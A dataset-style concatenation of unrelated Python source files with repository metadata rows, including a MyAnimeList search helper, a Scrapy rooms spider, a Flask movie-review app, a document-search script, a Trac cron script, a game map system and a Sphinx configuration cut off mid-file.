raise ValueError("Invalid argument for {}, must be either {} or {}.".format(search_type, "anime", "manga"))
url = "https://myanimelist.net/api/{}/search.xml?q={}".format(search_type, search_string.replace(" ", "+"))
# send the async search request to the server
r = ui.threaded_action(network.make_request, "Searching for \"{}\"".format(search_string), request=requests.get,
url=url, auth=credentials, stream=True)
# check if there was an error with the user's internet connection
if r == network.StatusCode.CONNECTION_ERROR:
agent.print_connection_error_msg()
return r
if r.status_code == 204:
agent.print_msg("I'm sorry I could not find any results for \"{}\".".format(search_string))
return StatusCode.NO_RESULTS
elif r.status_code == 200:
# decode the raw content so beautiful soup can read it as xml not a string
r.raw.decode_content = True
soup = BeautifulSoup(r.raw, "xml")
# get all entries
matches = soup.find_all("entry")
# store the length of all_matched list since needed multiple times
num_results = len(matches)
if num_results == 1:
if display_details:
display_entry_details(matches[0])
else:
return matches[0]
else:
agent.print_msg("I found {} results. Did you mean:".format(num_results))
# iterate over the matches and print them out
for i in range(num_results):
# use a different layout for entries that don't have any synonyms
title_format = "{}> {} ({})" if matches[i].synonyms.get_text() != "" else "{}> {}"
click.echo(title_format.format(i + 1, matches[i].title.get_text(), matches[i].synonyms.get_text()))
click.echo("{}> [None of these]".format(num_results + 1))
# get a valid choice from the user
while True:
option = click.prompt("Please choose an option", type=int)
if 1 <= option <= num_results + 1:
break
else:
click.echo("You must enter a value between {} and {}".format(1, num_results + 1))
click.echo()
# check that the user didn't choose the none of these option before trying to display entry
if option != num_results + 1:
if display_details:
display_entry_details(matches[option - 1])
else:
return matches[option - 1]
else:
return StatusCode.USER_CANCELLED
else:
agent.print_msg("There was an error getting the entry on your list. Please try again.")
return network.StatusCode.OTHER_ERROR
| [
"aparm001@gold.ac.uk"
] | aparm001@gold.ac.uk |
e6eed95b3212fccef9210436c4333489b1221298 | 714472087861374f9cb79e627d305ae01415d940 | /18_d3/parse.py | 40fdaa2f116cf5a45aa28154338ccda188e36fb3 | [] | no_license | jacksonzou123/SoftDev | be02082166a96bb9b59e7a575449199b08dd2e88 | 9ed6a3c54749ba42e943edf5aac968f0fd4c2084 | refs/heads/master | 2020-07-23T16:47:32.499516 | 2020-04-22T16:49:57 | 2020-04-22T16:49:57 | 207,635,463 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | from pprint import pprint
from operator import itemgetter
import json
# OPTION OUTPUT FUNCTION FOR ORGANIZATION
def output(data, head):
output = [head]
file = open('output.csv','w')
for item in data:
output.append(','.join(item) + '\n')
file.writelines(output)
def parse():
# DATA CLEANING
f = open('leadingcauses.csv','r')
f = f.readlines()
data = []
for line in f[1:]:
if 'New York' in line and 'All Causes' not in line:
t = line[:-1].split(',')
entry = [t[0],t[-5],int(''.join(t[-3:][:-1]).strip('"'))]
data.append(entry)
# ORGANIZING DATA INTO NESTED DICT
datadict = {}
for item in data:
if item[0] not in datadict.keys():
datadict[item[0]] = {}
if item[1] not in datadict[item[0]].keys():
datadict[item[0]][item[1]] = item[2]
datadict = json.dumps(datadict)
return datadict
| [
"jzou00@stuy.edu"
] | jzou00@stuy.edu |
6a22e8f4dffd272e12fba138916e4c7de47b0cfc | 80d50ea48e10674b1b7d3f583a1c4b7d0b01200f | /src/datadog_api_client/v1/model/geomap_widget_definition.py | a47dba11739a217d6ebe6cc92133fe5fc63bbc9e | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"MPL-2.0"
] | permissive | DataDog/datadog-api-client-python | 3e01fa630278ad0b5c7005f08b7f61d07aa87345 | 392de360e7de659ee25e4a6753706820ca7c6a92 | refs/heads/master | 2023-09-01T20:32:37.718187 | 2023-09-01T14:42:04 | 2023-09-01T14:42:04 | 193,793,657 | 82 | 36 | Apache-2.0 | 2023-09-14T18:22:39 | 2019-06-25T22:52:04 | Python | UTF-8 | Python | false | false | 5,014 | py | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from __future__ import annotations
from typing import List, Union, TYPE_CHECKING
from datadog_api_client.model_utils import (
ModelNormal,
cached_property,
unset,
UnsetType,
)
if TYPE_CHECKING:
from datadog_api_client.v1.model.widget_custom_link import WidgetCustomLink
from datadog_api_client.v1.model.geomap_widget_request import GeomapWidgetRequest
from datadog_api_client.v1.model.geomap_widget_definition_style import GeomapWidgetDefinitionStyle
from datadog_api_client.v1.model.widget_time import WidgetTime
from datadog_api_client.v1.model.widget_text_align import WidgetTextAlign
from datadog_api_client.v1.model.geomap_widget_definition_type import GeomapWidgetDefinitionType
from datadog_api_client.v1.model.geomap_widget_definition_view import GeomapWidgetDefinitionView
class GeomapWidgetDefinition(ModelNormal):
validations = {
"requests": {
"max_items": 1,
"min_items": 1,
},
}
@cached_property
def openapi_types(_):
from datadog_api_client.v1.model.widget_custom_link import WidgetCustomLink
from datadog_api_client.v1.model.geomap_widget_request import GeomapWidgetRequest
from datadog_api_client.v1.model.geomap_widget_definition_style import GeomapWidgetDefinitionStyle
from datadog_api_client.v1.model.widget_time import WidgetTime
from datadog_api_client.v1.model.widget_text_align import WidgetTextAlign
from datadog_api_client.v1.model.geomap_widget_definition_type import GeomapWidgetDefinitionType
from datadog_api_client.v1.model.geomap_widget_definition_view import GeomapWidgetDefinitionView
return {
"custom_links": ([WidgetCustomLink],),
"requests": ([GeomapWidgetRequest],),
"style": (GeomapWidgetDefinitionStyle,),
"time": (WidgetTime,),
"title": (str,),
"title_align": (WidgetTextAlign,),
"title_size": (str,),
"type": (GeomapWidgetDefinitionType,),
"view": (GeomapWidgetDefinitionView,),
}
attribute_map = {
"custom_links": "custom_links",
"requests": "requests",
"style": "style",
"time": "time",
"title": "title",
"title_align": "title_align",
"title_size": "title_size",
"type": "type",
"view": "view",
}
def __init__(
self_,
requests: List[GeomapWidgetRequest],
style: GeomapWidgetDefinitionStyle,
type: GeomapWidgetDefinitionType,
view: GeomapWidgetDefinitionView,
custom_links: Union[List[WidgetCustomLink], UnsetType] = unset,
time: Union[WidgetTime, UnsetType] = unset,
title: Union[str, UnsetType] = unset,
title_align: Union[WidgetTextAlign, UnsetType] = unset,
title_size: Union[str, UnsetType] = unset,
**kwargs,
):
"""
This visualization displays a series of values by country on a world map.
:param custom_links: A list of custom links.
:type custom_links: [WidgetCustomLink], optional
:param requests: Array of one request object to display in the widget. The request must contain a ``group-by`` tag whose value is a country ISO code.
See the `Request JSON schema documentation <https://docs.datadoghq.com/dashboards/graphing_json/request_json>`_
for information about building the ``REQUEST_SCHEMA``.
:type requests: [GeomapWidgetRequest]
:param style: The style to apply to the widget.
:type style: GeomapWidgetDefinitionStyle
:param time: Time setting for the widget.
:type time: WidgetTime, optional
:param title: The title of your widget.
:type title: str, optional
:param title_align: How to align the text on the widget.
:type title_align: WidgetTextAlign, optional
:param title_size: The size of the title.
:type title_size: str, optional
:param type: Type of the geomap widget.
:type type: GeomapWidgetDefinitionType
:param view: The view of the world that the map should render.
:type view: GeomapWidgetDefinitionView
"""
if custom_links is not unset:
kwargs["custom_links"] = custom_links
if time is not unset:
kwargs["time"] = time
if title is not unset:
kwargs["title"] = title
if title_align is not unset:
kwargs["title_align"] = title_align
if title_size is not unset:
kwargs["title_size"] = title_size
super().__init__(kwargs)
self_.requests = requests
self_.style = style
self_.type = type
self_.view = view
| [
"noreply@github.com"
] | DataDog.noreply@github.com |
1dae09d80e9732787ff15d193913074f40163b78 | 69daffe62a9769ccacb8a7c27dd313ea58c20a15 | /DocSearch.py | 9caf3a3363a7d91615952faa6cf343ba8f8f9319 | [] | no_license | michaelwoodroof/Document-Search | 55acc6c1f4b0d2365a338f4a1c840985d13d6a26 | 5b5f55a66f58db87aad2d6805039b1555e9c3655 | refs/heads/master | 2022-11-20T17:33:19.170428 | 2020-07-15T12:08:59 | 2020-07-15T12:08:59 | 279,856,771 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,585 | py | import math
import operator
import numpy as np
# Stores all Unique Words as Keys, Values are where word is in Document
# Therefore builds Dictionary and Inverted Index in One
indexSearch = {}
angleStorage = []
queries = []
relevantDocuments = []
def main():
# Initial Assignment
global indexSearch
indexSearch = readFile("docs.txt",0)
queries = readFile("queries.txt",1)
print("Words in dictionary: " + str(len(indexSearch)))
# Query Loop
for query in queries:
print("Query: " + query)
print("Relevant documents: ", end = "")
angleStorage = []
# Finds Relevant Documents
relevantDocuments = querySearch(query,indexSearch)
for document in relevantDocuments:
print(document, end = " ")
print("")
for document in relevantDocuments:
# Add Results to Array
angleStorage.append(str(document) + "," + " %.5f" % calculateAngle(createVectorArray(query,indexSearch,document)))
# Sort in Order
tempVal = []
finalAngles = []
upper = len(angleStorage)
# Uses Selection Sort
while len(finalAngles) != upper:
pos = 0
tempVal = angleStorage[0].split(",")
tempVal = float(tempVal[1])
lowestValue = tempVal
for i in range(len(angleStorage)):
#Find Lowest Value
tempVal = angleStorage[i].split(",")
tempVal = float(tempVal[1])
if tempVal < lowestValue:
lowestValue = tempVal
pos = i
finalAngles.append(angleStorage[pos])
del angleStorage[pos]
# Print Formatted
for angles in finalAngles:
tempVal = angles.split(",")
print(tempVal[0] + " " + tempVal[1])
def chomp(line):
return map(operator.methodcaller('rstrip', '\r\n'), line)
def readFile(filePath,option):
temp = {}
file = open(filePath,'r')
idDoc = 0
if option == 0:
storage = {}
else:
storage = []
# Read Each Line
for line in chomp(file):
start = True
line = line.replace("\t"," ")
idDoc += 1
if option == 0:
line = line.split()
for word in line:
# Create Index
if storage.get(word):
# Existing Word
temp = storage.get(word)
if temp.get(idDoc):
storage[word][idDoc] += 1
else:
#New Word
temp[idDoc] = 1
storage[word] = temp
else:
# New Word
storage[word] = {idDoc: 1}
else:
# Creates Query Array
storage.append(line)
file.close()
return storage
def querySearch(query,index):
foundDocuments = []
keys = []
multipleQuery = query.split(" ")
counter = -1
# Load any and all Documents into Array
for query in multipleQuery:
counter += 1
foundDocuments.append([])
if query in index:
keys = index[query]
for key in keys:
foundDocuments[counter].append(key)
# Perform Intersection if multiple word query
for i in range(1, len(foundDocuments)):
foundDocuments[0] = intersection(foundDocuments[0],foundDocuments[i])
foundDocuments = foundDocuments[0]
return foundDocuments
def intersection(A,B):
intersect = []
for elementA in A:
for elementB in B:
if elementB == elementA and (elementB not in (intersect) or elementA not in (intersect)):
intersect.append(elementB)
break
return intersect
def calculateAngle(arr):
a = arr[0]
b = arr[1]
normA = np.linalg.norm(a)
normB = np.linalg.norm(b)
cosTheta = np.dot (a,b) / (normA * normB)
theta = math.degrees(math.acos(cosTheta))
return theta
def createVectorArray(query,index,docID):
# Split Query
arr = []
queries = query.split(" ")
innerDict = {}
counter = 0
A = np.zeros((len(index),), dtype=int) #A is Query
B = np.zeros((len(index),), dtype=int) #B is Document
for key in index:
innerDict = index[key]
for query in queries:
if key == query:
A[counter] = 1
if innerDict.get(docID):
B[counter] = innerDict[docID]
counter += 1
arr.append(A)
arr.append(B)
return arr
main()
| [
"+michaelwoodroof@users.noreply.github.com"
] | +michaelwoodroof@users.noreply.github.com |
dbb95066a2096e44cf9152e21997cbc1be537e1f | cc2859b4777d57e99fd1e83eaf0e7b6a3fcb6b5e | /test_project/build/lib/test_project/spiders/rooms.py | 018f578c809d4cd7d886cbf04b49e5ebebaaf73c | [] | no_license | Hiroki111/scrapy-test | 748c81f63b189a45c1eaad93daa36d26c5f37827 | f52d628dfe99a4234eb3b13898b6cc710c30f448 | refs/heads/master | 2020-07-30T06:59:09.576177 | 2019-09-22T10:10:31 | 2019-09-22T10:10:31 | 210,126,437 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,643 | py | # -*- coding: utf-8 -*-
from scrapy import Spider
from scrapy import Request
from scrapy.loader import ItemLoader
from test_project.items import PriceSpiderItem
from time import sleep
import random
class RoomsSpider(Spider):
    """Scrapy spider that scrapes room prices from a flatmates.com.au
    search-result listing and follows the 'next page' link."""
    # NOTE(review): this sleep runs ONCE, at class-definition (import) time,
    # not between requests.  If a per-request delay was intended, Scrapy's
    # DOWNLOAD_DELAY setting is the usual mechanism -- TODO confirm intent.
    sleep(random.randrange(1, 3))
    name = 'rooms'
    # NOTE(review): allowed_domains normally holds bare domains (e.g.
    # 'flatmates.com.au'); including a URL path here may cause offsite
    # filtering to drop followed links -- verify against scrapy docs.
    allowed_domains = [
        'flatmates.com.au/rooms/annerley-4103/males+min-150+max-180']
    start_urls = [
        'http://flatmates.com.au/rooms/annerley-4103/males+min-150+max-180/']
    def parse(self, response):
        """Extract each room's price ribbon text, then follow pagination."""
        # l = ItemLoader(item=PriceSpiderItem(), response=response)
        # for room in response.xpath('.//*[@class="ribbon property"]/text()'):
        # price = room.extract()
        # l.add_value('price', price)
        # yield l.load_item()
        # nextUrl = response.xpath(
        # '/html/body/div[2]/div[2]/div/nav/div[2]/a/@href').extract_first()
        # if nextUrl is not None:
        # absoluteNextUrl = response.urljoin(nextUrl)
        # yield Spider.scrapy.Request(absoluteNextUrl, callback=self.parse)
        rooms = response.xpath(
            './/*[@class="ribbon property"]/text()')
        # A single ItemLoader accumulates every price seen on the page, and
        # an item is yielded after each add -- so each successive item
        # repeats all earlier prices.  Presumably intentional? -- TODO review.
        l = ItemLoader(item=PriceSpiderItem(), response=response)
        for room in rooms:
            price = room.extract()
            l.add_value('price', price)
            # print(price)
            yield l.load_item()
        # Follow the pagination link (position-based XPath; brittle if the
        # site layout changes).
        nextUrl = response.xpath(
            '/html/body/div[2]/div[2]/div/nav/div[2]/a/@href').extract_first()
        absoluteNextUrl = response.urljoin(nextUrl)
        print('absoluteNextUrl ' + absoluteNextUrl)
        yield Request(url=absoluteNextUrl, callback=self.parse)
| [
"htakahashi@localhost.localdomain"
] | htakahashi@localhost.localdomain |
09b0bfd7ba89b753adde15365a1674b25fb38d71 | 1488955228c48cbaff586e2a8d86249a47645d0d | /app/main/views.py | ec63c98a0f7b5aab3d87e02ab569d663a4452b22 | [] | no_license | vincentouma/watchlist | a286c9d09bb06b18edfa4bc8883e9ec7f302bd01 | 329f90c23e373e14a29f1764cb8958adbbb02279 | refs/heads/master | 2020-06-28T11:00:17.353435 | 2019-08-02T10:19:16 | 2019-08-02T10:19:16 | 198,234,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,956 | py | from flask import render_template,request,redirect,url_for,abort
from . import main
from ..requests import get_movies,get_movie,search_movie
from ..models import Review, User
from .forms import ReviewForm,UpdateProfile
from flask_login import login_required,current_user
from .. import db,photos
import markdown2
#views
@main.route('/')
def index():
    '''
    View root page function that returns the index page and its data.

    Shows popular / upcoming / now-playing movies; if a search query was
    submitted, redirects to the search view instead.
    '''
    # getting movie lists from the API helper
    popular_movies = get_movies('popular')
    upcoming_movie = get_movies('upcoming')
    now_showing_movie = get_movies('now_playing')
    title = 'Home - Welcome to The Best best Movie Review Website Online'
    # Renamed from `search_movie` so the local no longer shadows the
    # imported search_movie() helper used by the search view.
    movie_query = request.args.get('movie_query')
    if movie_query:
        return redirect(url_for('.search', movie_name=movie_query))
    else:
        return render_template('index.html', title=title, popular=popular_movies,
                               upcoming=upcoming_movie, now_playing=now_showing_movie)
@main.route('/movie/<int:id>')
def movie(id):
    '''
    View function that returns a single movie's detail page, with its
    stored reviews.
    '''
    movie = get_movie(id)
    title = f'{movie.title}'
    # Reviews previously saved for this movie id.
    reviews = Review.get_reviews(movie.id)
    return render_template('movie.html', title = title, movie = movie, reviews = reviews)
@main.route('/search/<movie_name>')
def search(movie_name):
    '''
    View function to display search results.

    The raw name is converted to a '+'-separated query string, the format
    expected by the search_movie() API helper.
    '''
    movie_name_list = movie_name.split(" ")
    movie_name_format = "+".join(movie_name_list)
    searched_movies = search_movie(movie_name_format)
    # Fixed typo in the user-facing title ("resultd" -> "results").
    title = f'search results for {movie_name}'
    return render_template('search.html', title = title, movies = searched_movies)
@main.route('/movie/review/new/<int:id>', methods = ['GET','POST'])
@login_required
def new_review(id):
    '''
    Show (GET) or process (POST) the new-review form for a movie.
    On a valid submission the review is saved and the user is redirected
    back to the movie's detail page.
    '''
    form = ReviewForm()
    movie = get_movie(id)
    if form.validate_on_submit():
        title = form.title.data
        review = form.review.data
        # Updated review instance
        new_review = Review(movie_id=movie.id,movie_title=title,image_path=movie.poster,movie_review=review,user=current_user)
        # save review method
        new_review.save_review()
        return redirect(url_for('.movie',id = movie.id ))
    title = f'{movie.title} review'
    return render_template('new_review.html',title = title, review_form=form, movie=movie)
@main.route('/user/<uname>')
def profile(uname):
    '''
    Show a user's profile page; 404 if the username is unknown.
    '''
    user = User.query.filter_by(username = uname).first()
    if user is None:
        abort(404)
    return render_template("profile/profile.html", user = user)
@main.route('/user/<uname>/update',methods = ['GET','POST'])
@login_required
def update_profile(uname):
    '''
    Show (GET) or process (POST) the bio-update form for a user.
    404 if the username is unknown.
    '''
    user = User.query.filter_by(username = uname).first()
    if user is None:
        abort(404)
    form = UpdateProfile()
    if form.validate_on_submit():
        user.bio = form.bio.data
        db.session.add(user)
        db.session.commit()
        return redirect(url_for('.profile',uname=user.username))
    return render_template('profile/update.html',form =form)
@main.route('/user/<uname>/update/pic',methods= ['POST'])
@login_required
def update_pic(uname):
    '''
    Handle a profile-picture upload for the given username, then redirect
    back to the profile page.  404 if the username is unknown.
    '''
    user = User.query.filter_by(username = uname).first()
    # Consistency with profile()/update_profile(): unknown user -> 404
    # instead of an AttributeError below.
    if user is None:
        abort(404)
    if 'photo' in request.files:
        filename = photos.save(request.files['photo'])
        # Bug fix: the saved filename was never interpolated into the
        # stored path (a literal placeholder string was stored instead).
        path = f'photos/{filename}'
        user.profile_pic_path = path
        db.session.commit()
    return redirect(url_for('main.profile',uname=uname))
@main.route('/review/<int:id>')
def single_review(id):
    '''
    Show one review, with its body rendered from Markdown to HTML.
    404 if the review id is unknown.
    '''
    review=Review.query.get(id)
    if review is None:
        abort(404)
    # Render the stored Markdown with code-block support enabled.
    format_review = markdown2.markdown(review.movie_review,extras=["code-friendly", "fenced-code-blocks"])
    return render_template('review.html',review = review,format_review=format_review)
| [
"vinceoumah@gmail.com"
] | vinceoumah@gmail.com |
c1f9188c2cdd2441cf93c01548fc01884afa940a | a926b7ab55732a847033696d57c24f6d9b4c12b8 | /cron/run-client-event | 4ba52c45c811ce8a90e07df69d95cfdbd88d6806 | [] | no_license | aroth-arsoft/pkg-trac-clients | a24b3a2dff3ebfe498cc5dc9b0e0bdca888bc896 | 1dce48700c4c08b381c7cdbb42ebb6e872747acd | refs/heads/master | 2021-06-07T19:35:31.378278 | 2021-04-17T12:43:46 | 2021-04-17T12:43:46 | 135,186,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,434 | #!/usr/bin/env python
# run-client-event
# ----------------------------------------------------------------------------
# Copyright (c) 2008 Colin Guthrie
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
# This email integration script is meant to interface to the Trac
# (http://www.edgewall.com/products/trac/) issue tracking/wiki/etc
# system
import sys
import locale
from optparse import OptionParser
from trac.env import open_environment
# Command-line interface (Python 2 / optparse era): both -e and -c are
# required; the __main__ guard below enforces that.
parser = OptionParser()
# NOTE(review): `depr` is assigned but never used -- looks like a leftover
# suffix once appended to help strings of deprecated options.
depr = '(not used anymore)'
parser.add_option('-e', '--env', dest='envpath',
                  help='Required. Path to the Trac environment.')
parser.add_option('-c', '--event', dest='event',
                  help='The client event to run (required)')
# parser.add_option('-d', action='store_true', dest='debug',
#                   help='Turn on debug mode - does not update database '
#                   'and prints verbose messages.')
# parser.add_option('-m', '--mail', dest='mail',
#                   help='Email override. Useful in combination with -d.')
# parser.set_defaults(period='daily', mailtype='summary')
(options, args) = parser.parse_args(sys.argv[1:])
class SendClientFakeReq:
    """Minimal stand-in for a Trac request object, used when firing client
    events from cron -- i.e. outside any real HTTP request.

    Every link helper renders as the empty string, except ticket links,
    which render as '#<num>'.
    """

    def __init__(self):
        class _HrefStub:
            def __call__(self, *args, **kwargs):
                return ''

            def wiki(self, *args, **kwargs):
                return ''

            def ticket(self, num):
                return '#%d' % (num)

        self.href = _HrefStub()
        self.abs_href = _HrefStub()
        # Instance attribute deliberately shadows the perm() method below:
        # code reading req.perm sees an empty permission list.
        self.perm = []

    def __call__(self, *args, **kwargs):
        return ''

    def perm(self, *args, **kwargs):
        return []
class RunClientEvents:
    """Triggers all Trac 'client events' of the requested type.

    Instantiating the class does all of the work (side effects in __init__):
    it opens the Trac environment given by --env, syncs the repository and
    fires the event named by --event for every client.
    """

    def __init__(self):
        locale.setlocale(locale.LC_ALL, '')
        self.env = open_environment(options.envpath)
        # Client-event code expects a Trac request object; supply the fake.
        self.req = SendClientFakeReq()
        # Sync the repo so that any commits that happen to have been made
        # that include client comments are included.
        repos = self.env.get_repository()
        repos.sync()
        from clients.events import ClientEvent
        ClientEvent.triggerall(self.env, self.req, options.event)
if __name__ == '__main__':
    # Both --env and --event are mandatory; otherwise point at --help.
    # (Python 2 print statement -- this script predates Python 3.)
    if not options.envpath or not options.event:
        print "For usage: %s --help" % (sys.argv[0])
    else:
        RunClientEvents()
| [
"aroth@arsoft-online.com"
] | aroth@arsoft-online.com | |
6c3171994b3a7e1ab9015c0eee96818085aa12b2 | 7ec4cfebfacc504b919a8c2026083d7dc86a829d | /jkEngine/systems_library/map_system.py | dc5615a74eedcb2d5bc0731cdc9f31f2237133e0 | [
"Apache-2.0"
] | permissive | liamcoau/jkEngine | bcf3ad3783ef120052cf3d10bf10e8770ef72651 | 459157d167295abbac570c122e335c16a3b8c68b | refs/heads/master | 2021-06-09T15:14:30.934276 | 2017-06-02T02:20:07 | 2017-06-02T02:20:07 | 19,007,219 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,213 | py | from jkEngine.abstracts import MapSystem
from jkEngine.sfml import Texture, Color, Vector2, RectangleShape
from jkEngine.utils import Vector, Sprite2D
import random, math
class MapSystem (MapSystem):
    """Endless-runner map system: scrolling background, procedurally
    extended ground blocks and randomly placed damage blocks.

    NOTE(review): the class shadows the abstract MapSystem it inherits from
    (same name imported above) -- confusing, though it works.
    """

    def __init__ (self):
        #Attributes
        # Entity aspects this system consumes each tick.
        self.aspectTypes = ["position"]
        texture = Texture.from_file("jkEngine/resources/Example Game/background.png")
        self.background = Sprite2D(texture)
        self.background.setZindex(-1)
        # Number of 1280px-wide ground segments generated so far.
        self.currentBlocks = 0
        self.damageBlockTexture = Texture.from_file("jkEngine/resources/Example Game/damage_block.png")
        super().__init__()

    def init (self, world):
        """One-time world setup: register groups and create the first
        ground segment; cache graphics access and the player entity id."""
        super().init(world)
        self.worldEntity = []
        self.world.groupManager.addGroup("damage block")
        self.world.groupManager.addGroup("ground geometry")
        self.generateGround(Vector(-640, 232))
        #self.backgroundEntity = self.world.entityManager.newEntity()
        #self.backgroundEntity.addComponent(Vector(0,0), "position")
        #self.backgroundEntity.addComponent(0.0, "rotation")
        #self.background.offset = Vector(640, 360)
        #self.backgroundEntity.addComponent(self.background, "sprite")
        self.g = self.world.engine.getGraphicsAccess()
        self.pawn = self.world.tagManager.getID("Pawn")

    def generateGround (self, position):
        """Create one 1280x128 ground segment at *position*; from the
        second segment on, also scatter two damage blocks at random,
        horizontally separated x positions (kept at least 65px apart)."""
        self.worldEntity.append(self.world.entityManager.newEntity())
        self.world.groupManager.addToGroup(self.worldEntity[-1], "ground geometry")
        self.worldEntity[-1].addComponent(position, "position")
        self.worldEntity[-1].addComponent(0.0, "rotation")
        groundBlockTexture = Texture.from_file("jkEngine/resources/Example Game/ground.png")
        groundBlock = Sprite2D(groundBlockTexture)
        groundBlock.setZindex(1)
        self.worldEntity[-1].addComponent(groundBlock, "sprite")
        # Collision layer cycles 1..3 per segment -- presumably a layer id;
        # TODO confirm against the collision system.
        self.worldEntity[-1].addComponent([{((self.currentBlocks % 3) + 1): [[RectangleShape((1280, 128)), (0, 0)]]}, {}], "collision")
        self.currentBlocks += 1
        if self.currentBlocks > 1:
            p1 = random.randrange(1216)
            p2 = random.randrange(1216)
            #p3 = random.randrange(1216)
            #p4 = random.randrange(1216)
            # math.sqrt(x*x) is just abs(p1 - p2): enforce 65px separation.
            while (math.sqrt((p1 - p2) * (p1 - p2))) < 65:
                p2 = random.randrange(1280)
            self.generateDamageBlock(Vector((self.currentBlocks * 1280) + p1 - 1280, 232))
            self.generateDamageBlock(Vector((self.currentBlocks * 1280) + p2 - 1280, 232))
            #self.generateDamageBlock(Vector((self.currentBlocks * 1280) + p3 - 1280, 232))
            #self.generateDamageBlock(Vector((self.currentBlocks * 1280) + p4 - 1280, 232))

    def generateDamageBlock (self, position):
        """Create one 64x64 damage-block entity at *position* (collision
        layer -1)."""
        block = self.world.entityManager.newEntity()
        self.world.groupManager.addToGroup(block, "damage block")
        block.addComponent(position, "position")
        block.addComponent(0.0, "rotation")
        damageBlock = Sprite2D(self.damageBlockTexture)
        damageBlock.setZindex(2)
        block.addComponent(damageBlock, "sprite")
        block.addComponent([{-1: [[RectangleShape((64, 64)), (0, 0)]]}, {}], "collision")

    def tick (self, deltaTime):
        """Extend the ground one segment ahead once the pawn crosses the
        boundary of the last generated segment."""
        #self.aspect["position"][self.backgroundEntity.id] = self.aspect["position"][self.world.tagManager.getID("PlayerCamera")].copy().add(Vector(-640, -360))
        location = self.aspect["position"][self.pawn]
        if location[0] > (self.currentBlocks - 1) * 1280:
            self.generateGround(Vector((self.currentBlocks * 1280) - 640, 232))
| [
"liamcoau@gmail.com"
] | liamcoau@gmail.com |
da6cc4d0465295d7dfc8e71959ada0bb8de28a93 | 87706e10023b027bf6b4ef9146242a99c0ebbea2 | /docs/conf.py | 1fe4bd3668497bf382483451a6823a64d9af1fb9 | [
"Unlicense"
] | permissive | Kadantte/anime-downloader | 206dc7b9850d6494135ee143c4069df024e500d0 | 24de83d4ef392e17f39710cc9054ff90e3602533 | refs/heads/master | 2022-09-24T02:16:30.770196 | 2022-09-12T11:12:28 | 2022-09-12T11:12:28 | 168,595,085 | 8 | 0 | Unlicense | 2022-09-12T15:01:57 | 2019-01-31T20:54:19 | Python | UTF-8 | Python | false | false | 5,643 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../anime_downloader'))
# -- Project information -----------------------------------------------------
project = 'anime-downloader'
copyright = '2018, Vishnunarayan K I'
author = 'Vishnunarayan K I'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '3.5.0'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'alabaster'
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'anime-downloaderdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
